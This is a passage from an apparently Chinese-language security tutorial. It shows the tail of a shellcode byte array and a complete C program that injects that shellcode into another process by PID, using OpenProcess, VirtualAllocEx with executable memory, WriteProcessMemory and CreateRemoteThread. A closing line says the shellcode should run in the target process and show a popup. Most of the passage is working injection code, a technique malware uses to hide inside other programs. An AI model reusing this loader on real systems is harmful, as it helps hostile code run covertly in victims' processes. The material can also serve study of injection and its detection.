0xE0, 0x61, 0x72, 0x79, 0x57,
0xC6, 0x45, 0xE4, 0x00, 0xE8, 0xA7, 0x00, 0x00, 0x00, 0x50, 0xFF, 0xD6, 0x33, 0xC9, 0xC7, 0x45,
0xC0, 0x75, 0x00, 0x73, 0x00, 0x66, 0x89, 0x4D, 0xD4, 0x8D, 0x4D, 0xE8, 0x51, 0x8D, 0x4D, 0xC0,
0x5D, 0xC3
};
int main(int argc, char *argv[])
{
DWORD targetPid = 2816;
HANDLE h_target = NULL;
LPVOID p_base = NULL;
HANDLE h_thread = NULL;
h_target = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPid);
if (h_target == NULL)
{
goto main_end;
}
p_base = VirtualAllocEx(h_target, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (p_base == NULL)
{
goto main_end;
}
if (!WriteProcessMemory(h_target, p_base, (LPVOID)shellcode, sizeof(shellcode), NULL)) {
goto main_end;
}
h_thread = CreateRemoteThread(h_target, 0, 0, (LPTHREAD_START_ROUTINE)p_base, NULL, 0, NULL);
if (h_thread == NULL)
{
goto main_end;
}
main_end:
if (h_target)
CloseHandle(h_target);
if (h_thread)
CloseHandle(h_thread);
getchar();
return 0;
}
如果一切顺利,则读者可看到这段ShellCode已经在特定进程内实现运行了,并输出了如下图所示的弹窗提示;
原文地址
https://www.lyshark.com/post/9cc4ded5.html
|